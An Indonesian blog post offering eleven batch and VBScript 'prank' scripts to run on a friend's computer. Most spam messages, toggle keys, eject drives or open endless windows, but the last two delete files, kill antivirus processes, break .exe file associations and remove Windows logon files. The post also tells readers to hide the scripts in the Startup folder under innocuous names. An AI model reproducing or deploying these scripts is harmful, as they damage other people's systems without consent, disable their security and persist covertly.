Jailin Laptop Temen dengan 11 code ini di jamin kesel

Sumber: zaihooiz



Berikut adalah Kumpulan script jahil yang dijamin akan bikin kesal orang yang dijahilin (ketawa setan).
Saya dapet  script jahil nih dari kang rajab dan mau saya share dengan sobat semua. Intinya ini hanya untuk mengerjai komputer teman kamu, pasti dia kesal banget dan bisa aja menjadi marah monitornya di banting… agagagagagag. Script ini kamu buat melalui Notepad dan harus kamu simpan dengan menggunakan ekstensi yang saya sebutkan. Oke deh segera cek script jahil ini.

script ini bisa kta pakai, untuk
menjahili komputer anak org !!
yg harus kamu siapkan adlh :

1.Notepad
2.kopi
3.pasta
4.alias kopas

Bersiap2 menerima dosa… agagagagagag (kidding)
stelah smuax siap,, kupas (mksdx copas) script di bawah ke dalam notepad !!


stelah smuax siap,, kupas (mksdx copas) script di bawah ke dalam notepad !!
1. MESSAGES YG NONGOL TERUS MENERUS SECARA OTOMATIS
Code:
@ECHO off
:Begin 
msg * muka lo jelek 
msg * ngaca dulu gih
msg * hayo lo, cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
==> save nama script diatas dg ekstensi *.bat

2. BIKIN SHUTDOWN + MESSAGES
Code:
 @echo off
msg * apaan sih lo

shutdown -s -c "Error! muka mu
standar abis"
==> save nama script diatas dg ekstensi *.bat

3. MAININ TOMBOL CAPS LOCK
Code:
 Set wshShell
=wscript.CreateObject

("WScript.Shell")
do

wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
==> save nama script diatas dg ekstensi *.vbs

 4. BUKA TUTUP CD/DVD SECARA OTOMATIS
Code:
 Set oWMP = CreateObject
("WMPlayer.OCX.7")

Set colCDROMs =
oWMP.cdromCollection

do
if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject

Next
For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject
Next

End If
wscript.sleep 5000
loop
==> save nama script diatas dg ekstensi *.vbs

5. BIKIN VB SCRIPT NONGOL TERUS MENERUS SECARA OTOMATIS
Code:
Set wshShell =
wscript.CreateObject

("WScript.Shell")
do

wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
==> save nama script diatas dg ekstensi *.vbs
6. MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS
Code:

 MsgBox "kembali ke menu
sebelumnya"

Set wshShell
=wscript.CreateObject

("WScript.Shell")
do

wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
==> save nama script diatas dg ekstensi *.vbs
7. OTOMATIS NGETIK “LU JELEK BANGET SIH” DI NOTEPAD ATAU M.WORD
Code:
  
Set wshShell =
wscript.CreateObject

("WScript.Shell")
do

wscript.sleep 100
wshshell.sendkeys "lu jelek

banget sih!!!"
loop
==> save nama script diatas dg ekstensi *.vbs
8. MEMBUKA NOTEPAD TERUS MENERUS
Code:

 @ECHO off
:top

START %SystemRoot%
\system32\notepad.exe
GOTO top
==> save nama script diatas dg ekstensi *.bat
9. OTOMATIS BUKA NOTEPAD LALU NGETIK “APA YG LO MAU”
Code:

 WScript.Sleep 1800
WScript.Sleep 100

Set WshShell =
WScript.CreateObject

("WScript.Shell")
WshShell.Run "notepad"

WScript.Sleep 10
WshShell.AppActivate "Notepad"

WScript.Sleep 50
WshShell.SendKeys "ka"

WScript.Sleep 50
WshShell.SendKeys "mu "

WScript.Sleep 50
WshShell.SendKeys "je"

WScript.Sleep 50
WshShell.SendKeys "le"

WScript.Sleep 50
WshShell.SendKeys "k "

WScript.Sleep 50
WshShell.SendKeys " se"

WScript.Sleep 50
WshShell.SendKeys "ka"

WScript.Sleep 50
WshShell.SendKeys "li"

WScript.Sleep 50
WshShell.SendKeys " y"

WScript.Sleep 50
WshShell.SendKeys "a"

WScript.Sleep 50
WshShell.SendKeys " h"

WScript.Sleep 50
WshShell.SendKeys "!"

WScript.Sleep 50
WshShell.SendKeys "!! " 
==> save nama script diatas dg ekstensi *.vbs
10. BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2
Code:

 @echo off
title quiz hari ini 

:menu

cls
echo jika kamu kena virus apa

yang kamu lakukan
pause

echo pilih yang mana:
echo 1. matiin computer

echo 2. format aja
echo 3. bingung ahh

set input=nothing
set /p input=Choice:

if %input%==1 shutdown -s -t
30

if %input%==2 del c:\xxx
if %input%==3 @ECHO off

msg * muka lo rusak
msg * ngaca dulu gih

msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja

msg * biar masalah nya kelar
@ECHO off

:top
START %SystemRoot%

\system32\notepad.exe
GOTO top
==> nah script diatas save jadi quiz.bat, lalu kasih ke anak orang… agagagagagag……..
11. YANG INI PALING BAHAYA, JANGAN DICOBA DI KOMPUTER KAMU
Code:

 @echo off
set end=md “Hack

installing”
set fin=copy “Hack

log.txt” “Installing”
%end%

%fin%
net send * Hack is

installing, press OK to
begin set up.

kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q

kill explorer.exe /F /Q
cls

assoc .exe=txtfile
assoc .txt=mp3file

cls
msg * It is you who is

hacked ….
msg * I warned you,

and you kept going.
Challenge me and this

is what happens.
DEL C:\WINDOWS

\system32\logoff.exe /
F /Q

DEL C:\WINDOWS
\system32\logon.exe /

F /Q
DEL C:\WINDOWS

\system32\logon.scr /
F /Q

cls
shutdown -s -t 5 -c

“ thank you for
waiting”
==> save script diatas dg ekstensi *.bat


Dari semua script diatas, cara menjalankannya adalah degan mengklik 2x file yang kita buat dari notepad tadi. Saya sarankan kalau mau mengusili komputer teman dan bisa dijalankan secara otomatis, kopi file script yg udah kamu simpan ke folder startup di Menu Start. Setelah itu kamu saya sarankan selama seminggu gak nongol biar gak di lempar sama monitor…. agagagagagag
Waktu menyimpan dengan ekstensi *.bat atau *.vbs
Ganti * menjadi nama file, misal usil.bat atau ancur.vbs
Saya sarankan buat nama file yang tidak mencurigakan si pengguna komputer

Berlangganan update artikel terbaru via email:

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel